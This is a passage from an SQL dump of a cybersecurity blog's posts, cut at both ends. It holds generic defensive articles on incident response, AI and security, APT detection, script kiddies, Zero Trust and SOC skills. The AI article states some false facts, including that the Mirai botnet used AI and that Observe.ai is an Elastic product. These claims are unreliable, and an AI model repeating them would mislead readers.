regular testing and updates to remain effective in the face of evolving cyber threats. Here’s how to keep it up to date:\n\n### 1. Simulate Real Attacks\n\nConduct mock phishing campaigns, malware simulations, or tabletop exercises to test how well your team responds.\n\n### 2. Gather Feedback\n\nAfter a test or real incident, ask your team what worked and what didn’t. Use this input to refine your plan.\n\n### 3. Update Regularly\n\nCyber threats and technologies evolve quickly. Update your IRP to include lessons learned, new tools, and regulatory changes.\n\n### 4. Track Key Metrics\n\nMonitor how long it takes to detect, contain, and recover from incidents. Set goals to improve these response times.\n\n### 5. Foster a Culture of Improvement\n\nTreat every incident and exercise as a learning opportunity. Share findings across teams to ensure everyone is informed and prepared.\n\n---\n\n## Build Resilience with a Strong Incident Response Plan\n\nA well-designed **Incident Response Plan** is essential in today’s cyber landscape. It’s not just a tool for IT teams—it’s a critical part of protecting your business, your customers, and your reputation. With an IRP, you can minimize downtime, reduce costs, and recover faster when faced with cyber threats.\n\nCybersecurity is no longer optional. Whether you’re a business owner or an IT professional, building and refining an IRP is a vital step toward long-term resilience and success. Start today to stay ahead of evolving cyber risks and protect what matters most.', '', 'http://infoseclabs.io/uploads/1767586151372-678797972.png', 'Illustration of a business team executing a cybersecurity incident response plan', 1, 'published', '2026-01-04 23:08:00', '2026-01-05 07:09:23', 'Information Security', 'Essential Cybersecurity: Incident Response Plans', 'Discover why an Incident Response Plan is crucial for protecting your business from cyber threats and minimizing damage.', 'Incident Response Plan'),
(21, 'The Impact of AI on Cybersecurity: Opportunities and Threats', 'the-impact-of-ai-on-cybersecurity-opportunities-and-threats', '# The Impact of Artificial Intelligence on Cybersecurity\n\nArtificial intelligence (AI) is transforming industries across the globe, and cybersecurity is no exception. From enhancing threat detection and response to redefining how we approach online defenses, AI has become a powerful ally. However, it has also created new threats by amplifying the capabilities of cybercriminals.\n\nThis post explores the dual nature of AI within the realm of cybersecurity. You\'ll learn about its opportunities, risks, real-world applications, and the trends shaping its future.\n\n## How AI is Revolutionizing Cybersecurity\n\nCyber threats are more sophisticated and persistent than ever. Traditional, reactive security systems often fall short in detecting and mitigating attacks quickly. Enter AI, which has proven to be a game-changer.\n\nAI in cybersecurity excels at recognizing patterns within enormous datasets, detecting abnormalities, and responding to potential threats with speed and accuracy. It paves the way for smarter, more efficient security protocols, ultimately reshaping how organizations tackle security challenges. But as with every powerful tool, AI opens doors for both defenders and attackers.\n\n### Why AI Matters in Cybersecurity\n\n- **Volume of Threats**: Cyber threats are increasing; AI helps organizations tackle this growing challenge efficiently.\n- **Real-time Responses**: AI-driven tools offer proactive rather than reactive measures.\n- **Complexity of Patterns**: Threat detection has evolved beyond detecting \"red flags.\" Machine learning (ML) algorithms recognize complex malicious behavior patterns.\n\n## Opportunities Created by AI in Cybersecurity\n\nAI brings a wealth of opportunities to cybersecurity professionals, giving defensive systems a critical edge.\n\n### Automated Threat Detection\n\nAI can analyze vast amounts of data to identify abnormal patterns in user behavior, network traffic, or application usage. This capability minimizes an organization\'s time-to-detect (TTD) and containment of cyberattacks, which is crucial in reducing damage.\n\n**Example:** AI-driven Security Information and Event Management (SIEM) platforms leverage ML to detect anomalies in real-time. Systems like Elastic\'s Observe.ai and IBM QRadar continuously improve their accuracy over time.\n\n### Enhanced Malware Detection\n\nAI’s ability to recognize nuanced patterns means it can detect and block even \"zero-day\" malware attacks. Unlike traditional systems requiring rule-based detection, AI tools analyze the behavior of files before they execute, flagging suspicious activity.\n\n### Improved Phishing Protection\n\nPhishing attacks are among the most common cyber threats, and AI plays a vital role in combating them:\n\n- AI tools scan emails for patterns and keywords associated with phishing.\n- Natural language processing (NLP) allows AI to identify tone and wording suggestive of fraudulent emails.\n\n### Faster Incident Response\n\nUsing predictive analytics, AI can suggest remediation measures more quickly than human analysts. Automated responses also reduce reliance on manpower, saving organizations time and financial resources.\n\n### Vulnerability Management\n\nAI tools like Tenable.io automate vulnerability scanning, identifying weaknesses before attackers can exploit them. AI continuously learns from data across networks, systems, and endpoints to maintain an up-to-date understanding of organizational threats.\n\n## Threats Posed by AI in Cybersecurity\n\nDespite its promise, AI has a darker side. It introduces threats that are making cybercriminals more dangerous than ever before.\n\n### AI-driven Cyberattacks\n\nAttackers are already leveraging AI to carry out highly targeted and efficient attacks:\n\n- AI is used to crack passwords faster than brute-force tools.\n- Malware is evolving, using AI capabilities to spread autonomously and adapt to anti-malware measures.\n\n### Deepfake Technology\n\nDeepfakes are AI-generated videos or audio recordings that simulate real people’s appearances or voices. This growing threat can be used for:\n\n- Impersonating executives to facilitate wire fraud (e.g., \"CEO voice scams\").\n- Creating fake videos to spread misinformation or cause reputational harm.\n\n### Exploitation of AI Systems\n\nCybercriminals are turning AI itself into a target:\n\n- They manipulate AI\'s training data to produce false positives or negatives, weakening its effectiveness.\n- Hackers exploit vulnerabilities in AI models to carry out adversarial attacks, which alter input data in a way that causes AI tools to malfunction.\n\n### Weaponization of Data\n\nAI needs massive datasets for training, but these datasets are often sensitive and retrievable. Should an attacker gain access, they can exploit or sell this stolen information.\n\n## Real-world Cases of AI in Cybersecurity\n\n### IBM’s Watson for Cybersecurity\n\nIBM Watson uses AI to analyze and interpret thousands of threat reports daily, shortening the time it takes security analysts to interpret threat intelligence and respond.\n\n**Impact:** Reduced threat analysis time and improved security postures for large organizations.\n\n### Google’s Chronicle Backstory\n\nChronicle, a cybersecurity tool by Google, uses AI to parse and correlate data across an organization’s infrastructure. This narrows down potential threats with incredible speed and accuracy.\n\n**Impact:** AI enhances internal threat hunting, detecting behavior that evades standard tools.\n\n### AI-powered Botnets\n\nUnfortunately, AI also empowers attackers. The infamous Mirai botnet used AI to infect IoT devices worldwide, leading to massive distributed denial-of-service (DDoS) attacks in 2016.\n\n**Impact:** Highlighted vulnerabilities in IoT devices while showcasing how AI can power large-scale attacks.\n\n## Future Trends in AI and Cybersecurity\n\n### Adaptive Security Systems\n\nWe foresee traditional, static security systems giving way to AI-powered adaptive systems capable of evolving to meet dynamic threats. These systems will detect, analyze, and respond based on real-time scenarios, offering a more resilient defense.\n\n### The Rise of Federated Learning\n\nFederated learning allows AI models to be trained on decentralized datasets without transferring sensitive data. This technique will enhance privacy while ensuring robust threat detection.\n\n### AI Collaboration\n\nFuture cybersecurity tools will lean on collaborative AI. For example, algorithms from multiple organizations may share anonymized data on emerging threats, creating a unified front against cyber criminals.\n\n### Regulation of AI in Cybersecurity\n\nGovernments and regulatory bodies will likely introduce stricter frameworks to govern the ethical and controlled use of AI tools. These regulations will balance innovation with security.\n\n## Strengthening Defenses with AI\n\nThe intersection of AI and cybersecurity is an exciting, high-stakes domain. While AI is a potent enabler of security advancements, it also presents new challenges that must be carefully managed. As we move forward, the collaboration between AI technologies and human expertise will be crucial in fortifying our defenses against cyber threats.', '', 'http://infoseclabs.io/uploads/1767586386191-18351172.png', 'AI-enhanced cybersecurity defense illustration', 1, 'published', '2026-01-05 15:12:00', '2026-01-06 04:37:20', 'Information Security', 'AI\'s Role in Cybersecurity: Opportunities & Threats', 'Explore how AI transforms cybersecurity, enhancing defenses and introducing new risks. Discover its dual impact and future trends.', 'AI cybersecurity'),
(22, 'Security Tool Analyst vs. Security Alerts Without Tools: Which Approach is Best?', 'security-tool-analyst-vs-security-alerts-without-tools-which-approach-is-best', '# Exploring Cybersecurity: Tools vs. Manual Analysis\n\nCybersecurity is a rapidly evolving field where protecting digital assets is critical for organizations of all sizes. With advancements in both threats and defenses, there is often debate over the best approach to security. Should we rely on technology and tools or focus on manual security alert analysis? What approach is more effective for job interviews, and do professionals really need to learn Digital Forensics and Incident Response (DFIR) manually?\n\nThis blog delves into these questions by exploring the roles of security tool analysts, examining the process of handling alerts without tools, and discussing their implications for career development and hiring. Read on to determine which approach aligns with your goals and how best to prepare for the evolving world of cybersecurity.\n\n## What is a Security Tool Analyst?\n\nSecurity tool analysts are professionals who work with software and tools specifically designed to detect, manage, and respond to security threats. Their role revolves around leveraging automated systems and platforms, such as:\n\n- SIEM (Security Information and Event Management) solutions\n- EDR (Endpoint Detection and Response) tools\n- Intrusion detection systems\n\nThese tools help analyze logs, monitor suspicious activities, and respond to security incidents efficiently.\n\n### Key Responsibilities of a Security Tool Analyst\n\n- Configuring and maintaining security tools used for threat detection.\n- Monitoring dashboards and analyzing alerts generated by security tools.\n- Investigating flagged incidents to determine their impact and severity.\n- Creating reports based on findings and providing recommendations.\n\nTools such as Splunk, QRadar, and CrowdStrike often form the backbone of their workflow, offering automation and insights critical to modern cybersecurity.\n\n### Advantages of Security Tools\n\n1. **Efficiency**: Tools automate repetitive tasks, allowing analysts to manage larger volumes of data in less time.\n2. **Accuracy**: Many tools detect intricate patterns that may be missed by manual observation, reducing the chance of human error.\n3. **Scalability**: Better suited for handling complex, large-scale networks with continuously growing traffic.\n\nHowever, reliance on tools comes with its challenges, such as overdependence and a potential gap in understanding the deeper technical mechanisms behind alerts.\n\n## Security Alerts Without Tools: A Hands-On Approach\n\nOn the other hand, some cybersecurity professionals believe in adopting manual approaches to monitoring and analyzing security alerts. This involves sifting through raw logs, network data, and endpoint activity without the use of advanced software solutions.\n\n### Challenges of Working Without Tools\n\n- **Time-Intensive**: Manually detecting, validating, and responding to alerts takes a significant amount of time.\n- **Prone to Errors**: Relying solely on human judgment can lead to mistakes, especially under time pressure.\n- **Resource-Heavy**: Requires deep expertise and consistent focus to manage alerts effectively.\n\nPractitioners argue that this approach sharpens core skills, builds a better understanding of underlying systems, and helps professionals tackle situations where they don’t have access to tools.\n\n### The Argument for Manual Security Analysis\n\nDespite its challenges, manual analysis provides a solid foundation in cybersecurity concepts. It ensures professionals can work in tool-agnostic environments and allows them to rely on expertise rather than software alone.\n\n## Security Tools vs. Manual Security Alerts\n\nWhen it comes to comparing the two approaches, several factors come into play, including efficiency, accuracy, and usability.\n\n| Factor          | Security Tool Analyst                      | Manual Security Alerts                                 |\n|-----------------|--------------------------------------------|--------------------------------------------------------|\n| **Efficiency**  | Highly efficient, especially for large-scale data. | Time-consuming and less practical for high-volume analysis. |\n| **Accuracy**    | Tools reduce human error but require proper tuning. | Deep understanding of systems minimizes false positives. |\n| **Learning Curve** | Easier to adopt with proper training.        | Requires extensive technical expertise and experience.   |\n| **Scalability** | Easily handles enterprise-level networks.   | Limited by human capacity and resources.                |\n\nIt’s clear that each method has its own strengths and weaknesses. For most organizations, the ideal approach is often a combination of both—a reliance on tools to handle efficiency and scale, paired with skilled professionals who can step in when tools fall short.\n\n## What Do Employers Look For in Interviews?\n\nIf you’re preparing for an interview as a security analyst, you may wonder which approach is more valued. The truth is, companies look for a balance between technical proficiency with tools and a foundational understanding of cybersecurity concepts.\n\n### Skills That Stand Out in Interviews\n\n- **Tool Proficiency**: Familiarity with popular platforms like Splunk, Palo Alto, or Elastic Security is almost always a plus.\n- **Problem-Solving**: Hiring managers want to see how you solve problems when tools fail or alerts are ambiguous.\n- **Foundational Knowledge**: A solid grasp of TCP/IP, intrusion detection techniques, and endpoint security matters as much as tool expertise.\n\nApplicants often gain an edge by showcasing their ability to adapt—highlighting how they’ve used tools to solve real-world challenges while demonstrating their capability to analyze security issues manually when needed.\n\n## Do Professionals Need to Learn DFIR Manually?\n\nDigital Forensics and Incident Response (DFIR) plays a critical role in addressing cybersecurity incidents. However, a common question is whether it’s essential for professionals to learn DFIR skills manually.\n\n### Pros of Learning DFIR Manually\n\n- **Deeper Insight**: Understanding the \"why\" and \"how\" behind security alerts helps identify patterns and root causes effectively.\n- **Tool Independence**: Professionals who train manually can perform investigations even without pre-configured software.\n- **Troubleshooting Complex Threats**: Manual skills ensure readiness for incidents that may crash or bypass enterprise security tools.\n\n### Cons of Manual DFIR Learning\n\n- **Time-Intensive**: Manual learning takes significant time and commitment, especially for professionals new to the field.', '', 'http://infoseclabs.io/uploads/1767838334749-937001140.jpg', 'Security analyst comparing automated tools with manual alert analysis', 1, 'published', '2026-01-07 21:12:00', '2026-01-08 05:12:23', 'Information Security', 'Security Tools vs Manual Alerts: Best Cyber Approach?', 'Explore the best cybersecurity approach: automated tools or manual alerts. Understand roles, efficiency, and career implications.', 'Cybersecurity Tools'),
(23, 'How Cybersecurity Professionals Can Detect Advanced Persistent Threats (APTs)', 'how-cybersecurity-professionals-can-detect-advanced-persistent-threats-apts', '# Advanced Persistent Threats: A Comprehensive Guide\n\nAdvanced Persistent Threats (APTs) are among the most sophisticated and potentially devastating cyber threats that organizations face today. These stealthy attackers target sensitive data, critical systems, and intellectual property, often remaining undetected for months or even years. For cybersecurity professionals, the ability to detect and remediate APTs is crucial for defending organizational assets.\n\nThis guide provides an in-depth look at how cybersecurity experts can identify APTs within their networks. We\'ll explore the APT lifecycle, proactive detection measures, effective tools, and real-world case studies, equipping you with practical strategies to stay ahead of these advanced threats.\n\n## Understanding Advanced Persistent Threats\n\n### What Are They and Why Are They Significant?\n\nAdvanced Persistent Threats are prolonged, targeted cyberattacks carried out by sophisticated adversaries, often backed by nation-states or highly organized cybercriminal groups. Unlike opportunistic attacks, APTs are meticulously planned and executed, with the primary goal of stealing sensitive information, causing financial loss, or disrupting operations.\n\nWhat distinguishes APTs from other cyber threats is their **persistence** and **stealth**. Attackers work patiently to infiltrate systems, evade detection, and maintain long-term access. This makes them particularly dangerous for organizations reliant on intellectual property, financial systems, or confidential customer data.\n\n### A Perspective on Cost and Risk\n\nAPTs are expensive—not just for attackers but for their victims. According to the Ponemon Institute, the average cost of a data breach is now $4.45 million globally, and breaches involving complex APTs often result in even higher costs.\n\nUnderstanding the significance of these threats is the first step toward detection and protection.\n\n## Decoding the APT Lifecycle\n\nTo effectively identify APTs, professionals must first understand their lifecycle. The APT lifecycle generally consists of the following stages:\n\n1. **Reconnaissance**  \n   Attackers gather information about the target organization using open-source intelligence (OSINT), web-based research, and phishing techniques.\n\n2. **Initial Intrusion**  \n   Leveraging spear-phishing emails, zero-day vulnerabilities, or poorly secured credentials, attackers establish their initial entry point.\n\n3. **Lateral Movement**  \n   Once inside the network, attackers explore internal systems, escalate privileges, and establish backdoors to ensure continued access.\n\n4. **Data Exfiltration**  \n   During this phase, attackers identify and extract valuable data, often using encrypted channels to evade detection.\n\n5. **Persistence**  \n   Attackers install additional backdoors or maintain a dormant presence, waiting for the right moment to strike again.\n\nUnderstanding this lifecycle helps security professionals predict attacker behavior and pinpoint potential entry and action points.\n\n## Proactive Measures to Detect APTs\n\n### Establish a Comprehensive Security Framework\n\nOne of the best strategies for detecting APTs is a proactive posture. Consider implementing these foundational measures:\n\n- **Network Segmentation**  \n  Limit attacker mobility by breaking your network into isolated segments. Proper segmentation minimizes the damage caused during lateral movement.\n\n- **Behavioral Analysis**  \n  Regularly analyze user and system behavior to identify unusual patterns, such as unauthorized access attempts or unexpected file transfers.\n\n- **Threat Hunting**  \n  Deploy dedicated threat-hunting teams to actively search for indicators of compromise (IoCs) in your network before automated tools do.\n\n### Prioritize Frequent Security Audits\n\nPeriodic vulnerability assessments and penetration testing help identify weak links that could facilitate an APT attack. Regularly updating software and applying patches for known vulnerabilities also decreases entry points for attackers.\n\n## Tools and Technologies for APT Detection\n\nModern cybersecurity teams must leverage advanced tools and technologies to combat APTs. Here are some of the most effective solutions available:\n\n### 1. **Endpoint Detection and Response (EDR)**\n\nEDR tools like CrowdStrike and Carbon Black provide real-time monitoring and response capabilities across endpoints, ensuring early detection of malicious activities.\n\n### 2. **Network Traffic Analysis (NTA)**\n\nSolutions such as ExtraHop and Darktrace use AI and machine learning to monitor network traffic and identify anomalies indicative of APT activity.\n\n### 3. **Security Information and Event Management (SIEM)**\n\nSIEM platforms like Splunk and IBM QRadar aggregate and analyze data from networks, devices, and applications to spot compromise indicators.\n\n### 4. **Threat Intelligence Platforms**\n\nTools like Recorded Future and ThreatQuotient provide access to actionable threat intelligence regarding the latest APT tactics, techniques, and procedures (TTPs).\n\nBy integrating these technologies, organizations can detect suspicious behaviors earlier and respond more effectively.\n\n## Incident Response and Remediation Strategies\n\n### Build a Playbook for APT Incidents\n\nEvery security team should have a detailed incident response plan tailored to APT scenarios. Key steps include:\n\n1. **Containment**  \n   Isolate affected systems to prevent lateral movement and further compromise.\n\n2. **Eradication**  \n   Remove malicious files, unauthorized accounts, and backdoors from your network.\n\n3. **Recovery**  \n   Restore systems from secure backups and monitor closely to ensure attackers don’t return.\n\n4. **Post-Incident Review**  \n   Conduct a comprehensive review of the incident to identify gaps in your defenses and improve future response efforts.\n\n### Train and Empower Your Team\n\nContinuous training ensures your cybersecurity team is well-equipped to address modern threats. Focus on simulation exercises and tabletop drills to test incident readiness.\n\n## Case Studies: Real-World Examples of APT Detection\n\nLooking at real-world scenarios can provide valuable insights into APT detection and response.\n\n### 1. **APT28 and the DNC Hack**\n\nThe Russian-backed APT28 (Fancy Bear) used spear-phishing emails to infiltrate the Democratic National Committee (DNC) systems, highlighting the importance of vigilance against such sophisticated threats.', '', 'http://infoseclabs.io/uploads/1767838642945-921379380.png', 'Cybersecurity professional analyzing network data to detect APTs', 1, 'published', '2026-01-07 13:17:00', '2026-01-08 05:19:30', 'Information Security', 'Detect Advanced Persistent Threats in Cybersecurity', 'Learn how to identify and combat Advanced Persistent Threats (APTs) to protect your organization\'s sensitive data and systems.', 'Advanced Persistent Threats');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(24, 'How to Defend Your Organization Against Script Kiddies', 'how-to-defend-your-organization-against-script-kiddies', '# Understanding and Defending Against Script Kiddies\n\nCyber threats come in all shapes and sizes, but one often underestimated group of attackers is the script kiddies. Despite their seemingly amateur status, they can wreak havoc on businesses and organizations of all sizes. Understanding who script kiddies are and how they operate is crucial for IT professionals and security leaders looking to safeguard their infrastructures.\n\nThis blog will explore the psychology behind script kiddies, the tools they rely on, signs of an impending attack, and detailed strategies to defend your organization. By the end, you\'ll have a robust understanding of how to proactively secure your systems and educate your team to build a human firewall against this threat.\n\n## What Are Script Kiddies and Why Should You Care?\n\nScript kiddies, or \"skiddies,\" are novice hackers who rely on pre-written scripts or hacking tools created by professional hackers. They don’t always have deep technical knowledge but can still cause significant disruption. Unlike sophisticated threat actors, their motives often range from curiosity and thrill-seeking to bragging rights.\n\nWhile they may lack the technical intelligence of seasoned cybercriminals, script kiddies pose a real threat. They exploit known vulnerabilities in systems, causing data breaches, service interruptions, or defacement of web properties. For businesses, this can mean downtime, financial loss, and damage to reputation.\n\nRemember, while their methods might seem less advanced, underestimating them is a mistake. They\'re opportunistic and relentless, searching for any weak link in your organization.\n\n## Understanding the Script Kiddy Mindset\n\nUnderstanding the motivations and approach of script kiddies is key to defending against them. Here\'s what fuels their activities:\n\n- **Thrill and Ego Boost**: Many script kiddies hack for the excitement of breaking into a system or to show off to their peers.\n- **Bragging Rights**: Defacing a website or taking a service offline often serves as a \"badge of honor.\"\n- **Ease of Access**: With a wealth of hacking tools, forums, and guides available online, almost anyone with basic computer knowledge can launch an attack.\n- **Target Preference**: Script kiddies are opportunistic and often target low-hanging fruit—organizations with weak defenses are their ideal victims.\n\nBy understanding these behaviors, you’re already better equipped to anticipate and block their attempts.\n\n## Common Tools and Techniques Used by Script Kiddies\n\nBy knowing what tools they use, you can identify vulnerabilities in your system and preemptively close gaps. Here are some popular approaches and tools commonly employed by script kiddies:\n\n1. **Scanning Tools**: Script kiddies often use automated tools like **Nmap** to scan for vulnerabilities in networks.\n2. **Brute Force Attack Tools**: Tools such as Hydra or John the Ripper are used to crack passwords by trying combinations repeatedly.\n3. **Exploit Kits**: These are pre-packaged kits (like the Metasploit Framework) that allow users to exploit known vulnerabilities in software.\n4. **Denial of Service (DoS) Attacks**: With tools like LOIC (Low Orbit Ion Cannon), script kiddies can overwhelm a server, causing unexpected downtime.\n5. **Social Engineering & Phishing Kits**: They may attempt low-tech approaches like phishing, often relying on kits purchased from underground forums.\n\nRecognizing these tools can help security teams predict likely attack methods and shore up weak points.\n\n## Spotting the Signs of an Impending Script Kiddy Attack\n\nEarly detection is vital to stopping a script kiddy in their tracks. Here are some key signs to look for within your network or systems:\n\n- Increased network scanning activity on your firewalls or intrusion detection systems (IDS).\n- Repeated failed login attempts, signaling brute force attacks.\n- Suspicious spikes in traffic, especially targeted at specific endpoints, indicating a potential DoS attack.\n- Emails or messages directing employees to click unknown links or provide credentials (phishing).\n\nMonitoring these anomalies and having alert systems in place can give you an early edge.\n\n## Strengthening Your Defenses Against Script Kiddies\n\n**Proactive security measures** are your first line of defense. Here’s how to bolster your organization’s security posture:\n\n1. **Update and Patch Regularly**: Keep all software and hardware systems updated to close existing vulnerabilities.\n2. **Employ a Strong Firewall and IDS**: Filter out malicious traffic using advanced firewalls and monitor for unusual activity with intrusion detection systems.\n3. **Enforce Strong Password Policies**: Ensure employees use complex, unique passwords and implement multi-factor authentication (MFA) for added security.\n4. **Limit Administrative Access**: Only grant high-level permissions to those who truly need them to minimize damage should an account be compromised.\n5. **Conduct Regular Security Audits**: Regular vulnerability assessments will help identify weak spots before attackers exploit them.\n\nImplementing these steps can make your organization a less attractive target for opportunistic script kiddies.\n\n## Have a Response Plan for When Attacks Occur\n\nPreventive measures are essential, but having an incident response plan ensures your team is ready to act if an attack does occur. Here’s what an effective plan should include:\n\n- **Immediate Containment**: Disconnect impacted systems from the network to prevent further damage.\n- **Root Cause Analysis**: Investigate the entry point and methods used to strengthen defenses going forward.\n- **Communication Protocols**: Notify stakeholders, employees, or customers if their data or services are affected.\n- **Recovery and Evaluation**: Restore systems from clean backups and ensure the vulnerabilities exploited during the attack are patched.\n\nTesting and updating your incident response plan helps your organization stay prepared for real-world scenarios.', '', 'http://infoseclabs.io/uploads/1767838758067-532321751.png', 'Cybersecurity professional defending against script kiddie attacks', 1, 'published', '2026-01-07 21:18:00', '2026-01-08 05:19:21', 'Information Security', 'Defend Against Script Kiddies: Essential Strategies', 'Learn how to protect your organization from script kiddies with effective strategies and insights into their tactics.', 'script kiddies'),
(25, 'What is Zero Trust Security, and Why Does It Matter?', 'what-is-zero-trust-security-and-why-does-it-matter', '# Understanding the Shift to Zero Trust Security\n\nCyber threats are evolving at an unprecedented pace, with bad actors finding new ways to infiltrate even the most secure networks. To tackle this, organizations are shifting away from traditional perimeter-based defenses and adopting a more robust, modern approach to security known as **Zero Trust**.\n\nBut what exactly is Zero Trust Security, and why is it becoming the gold standard for protecting sensitive information? This blog will break down the core principles of Zero Trust, its benefits, and how your organization can implement it effectively to safeguard its data and operations.\n\n## What is Zero Trust Security?\n\nZero Trust Security is a cybersecurity model built on the principle of \"never trust, always verify.\" Unlike traditional models that assume everything inside the network is trustworthy, Zero Trust treats every user, device, and application as a potential threat until proven otherwise.\n\nThis approach is particularly crucial as businesses increasingly adopt remote work, cloud computing, and IoT devices, creating complex environments where traditional security measures can fall short. Zero Trust ensures that access to systems and data is tightly controlled and monitored, reducing the risk of breaches.\n\n### Why is Zero Trust Important?\n\nThe rise of sophisticated cyberattacks, like ransomware and supply chain breaches, highlights the need for a proactive security stance. According to IBM\'s Cost of a Data Breach Report 2023, the average cost of a data breach has reached a staggering $4.45 million. Zero Trust addresses these challenges by adapting to the modern threat landscape and focusing on the following priorities:\n\n- Securing remote workforces and cloud-based environments.\n- Protecting against insider threats.\n- Reducing the attack surface for cybercriminals.\n\n## Core Principles of Zero Trust Security\n\nTo adopt a Zero Trust framework, organizations must align with its core principles. Below, we explore the foundational tenets of this model.\n\n### 1. Least Privilege Access\n\nOne of the fundamental principles of Zero Trust is granting users and devices the minimum level of access required to perform their tasks. By limiting access, Zero Trust mitigates the damage caused by compromised accounts or insider threats. For example, an HR employee may have access to payroll systems but not operational controls for cloud servers.\n\n**Tip**: Implement role-based access control (RBAC) to manage permissions effectively.\n\n### 2. Verify, Don\'t Trust\n\nZero Trust requires continuous verification of all users and devices attempting to access resources, even if they are already inside the network. Authentication mechanisms such as multi-factor authentication (MFA) ensure users are who they claim to be.\n\n**Example**: Even if an employee accesses the corporate network through a VPN, they\'ll still need to verify their identity when accessing critical applications like CRM software.\n\n### 3. Microsegmentation\n\nMicrosegmentation involves dividing networks into smaller, secure zones to limit unauthorized access. Think of it as breaking your network into \"rooms,\" where only authorized users can enter specific areas. This drastically reduces an attacker\'s ability to move laterally within the system.\n\n**Use Case**: Finance databases and marketing data exist in separate network segments to ensure that even if one is compromised, the other remains unaffected.\n\n### 4. Assume Breach\n\nZero Trust operates under the assumption that breaches are inevitable. This paradigm shifts focus from breach prevention alone to rapid detection, containment, and recovery. Strategies like advanced threat detection and real-time monitoring support this principle.\n\n**Implementation Tip**: Use tools like Security Information and Event Management (SIEM) and Endpoint Detection and Response (EDR) for enhanced visibility and incident response.\n\n## Benefits of Zero Trust Security\n\nZero Trust is not just a buzzword — it delivers tangible benefits crucial for modern enterprises. Here’s how adopting Zero Trust can bolster your organization’s defenses:\n\n### 1. Reduces the Attack Surface\n\nBy requiring continuous verification and tightly controlling access, Zero Trust minimizes the number of vulnerable entry points for attackers. This is especially important for companies operating in distributed environments with remote employees and hybrid clouds.\n\n### 2. Improves Threat Detection\n\nWith real-time monitoring and analytics, Zero Trust systems can identify unusual patterns and potential threats more effectively. Instead of relying on perimeter defenses, it emphasizes visibility across every layer of the IT ecosystem.\n\n### 3. Protects Against Insider Threats\n\nInsider threats, whether intentional or accidental, remain a significant risk. By restricting access and enforcing granular controls, Zero Trust ensures that no single user has unchecked access.\n\n**Statistic**: According to a report by Verizon, 19% of breaches in 2023 involved insider threats. Zero Trust directly addresses this issue.\n\n### 4. Strengthens Regulatory Compliance\n\nRegulations such as GDPR, HIPAA, and CCPA demand strict data protection measures. Zero Trust frameworks simplify compliance by providing comprehensive activity logging, encryption, and access control measures.\n\n### 5. Enhances User Experience\n\nWhile Zero Trust may sound rigid, its use of technologies like Single Sign-On (SSO) and MFA balances security with user convenience. Employees can securely access the resources they need without constant disruptions.\n\n## A Simplified Roadmap to Zero Trust Implementation\n\nImplementing Zero Trust may seem overwhelming, but with a deliberate approach, businesses can reap its rewards. Here\'s a step-by-step roadmap to get started:\n\n### Step 1. Evaluate Your Current Security Posture\n\nBegin by assessing your existing security framework. Identify assets (data, systems, devices), potential vulnerabilities, and privileged access points. This step helps you understand where to focus your efforts.\n\n### Step 2. Adopt Identity and Access Management (IAM)\n\nDeploy tools like MFA, SSO, and user identity verification solutions. Establish RBAC to ensure each employee only has access to necessary applications and data.\n\n- **Tool Example**: Okta or Microsoft Azure AD for IAM implementation.\n\n### Step 3. Segment Your Network\n\nIntroduce microsegmentation to create secure network zones. Use firewalls, virtual LANs (VLANs), or cloud-native security tools to isolate sensitive data and systems.\n\n### Step 4. Enforce Continuous Monitoring and Analytics\n\nImplement monitoring tools that provide real-time insights and raise alerts in the presence of anomalies. Advanced analytics can proactively identify potential risks.\n\n- **Recommended Tools**: SIEM platforms like Splunk or IBM QRadar.\n\n### Step 5. Pilot and Iterate\n\nStart small by applying Zero Trust to a single department or system. Gather feedback, assess the results, and scale based on lessons learned.\n\n### Step 6. Educate and Communicate\n\nZero Trust is not a \"set-it-and-forget-it\" model. Continuous employee training and communication are necessary to sustain your framework’s effectiveness.\n\n## Securing the Future with Zero Trust\n\nThe cyber threat landscape is constantly evolving, and outdated security models can no longer keep pace. Zero Trust Security offers businesses and IT leaders a proactive, modern solution to safeguard data, users, and systems in today’s complex environments.', '', 'http://infoseclabs.io/uploads/1767841056902-416013144.png', 'Illustration of a secure digital network representing Zero Trust principles', 1, 'published', '2026-01-07 21:57:00', '2026-01-08 05:57:37', 'Information Security', 'Zero Trust Security: A New Standard in Cyber Defense', 'Discover why Zero Trust Security is essential for safeguarding data in today\'s complex cyber landscape.', 'Zero Trust Security'),
(26, 'Top 10 Things Every SOC Analyst Should Know Inside Out', 'top-10-things-every-soc-analyst-should-know-inside-out', '# The Essential Skills for a SOC Analyst\n\nThe role of a Security Operations Center (SOC) Analyst demands vigilance, adaptability, and expertise. A SOC Analyst is the frontline defender in an organization\'s cybersecurity, tasked with monitoring, analyzing, and responding to potential threats before they escalate. What sets an exceptional SOC Analyst apart from a proficient one is a blend of core cybersecurity knowledge and practical, hands-on skills.\n\nWhether you\'re just starting your cybersecurity career or looking to deepen your expertise, this guide outlines the top 10 things every SOC Analyst should know. These essentials form the foundation of defending against cyberattacks and navigating the complex digital threat landscape.\n\n## 1. Master Networking Fundamentals\n\nA sound understanding of network operations is crucial for effectively detecting and mitigating cyber threats. SOC Analysts should have in-depth knowledge of foundational networking concepts, including:\n\n- **TCP/IP Protocol Suite**: Understanding IP addressing, packets, and how data moves across networks.\n- **OSI Model**: Knowing the seven layers of networking (physical, data link, network, transport, session, presentation, application) to identify vulnerabilities and pinpoint network issues.\n- **Subnetting**: Recognizing how subnetting divides large networks into smaller segments to enhance security and efficiency.\n- **Common Ports and Protocols**: Recognizing unusual use of ports (e.g., HTTP on port 80, HTTPS on port 443, FTP on port 21) can signal potential breaches.\n\nThis knowledge allows analysts to uncover anomalies in their environments while confidently troubleshooting network issues.\n\n## 2. Understand Security Principles\n\nTo effectively secure systems, an analyst must grasp fundamental security principles. These key concepts underpin almost every cybersecurity framework used today:\n\n- **CIA Triad (Confidentiality, Integrity, Availability)**: A guide to balancing data protection, ensuring that sensitive information is only accessible by authorized individuals (confidentiality), not tampered with (integrity), and available (availability) when needed.\n- **Least Privilege**: Ensuring users and systems only have access to what\'s strictly necessary to perform their functions.\n- **Defense in Depth**: A multi-layered security strategy where multiple measures protect a system. Even if one layer fails, others continue to provide protection.\n\nThese principles create the groundwork for strong security practices.\n\n## 3. Know Common Attack Vectors\n\nUnderstanding how attackers infiltrate systems helps SOC Analysts effectively detect and respond to threats. Familiarize yourself with these common attack methods:\n\n- **Malware (e.g., viruses, ransomware, Trojans, worms)**: Software designed to 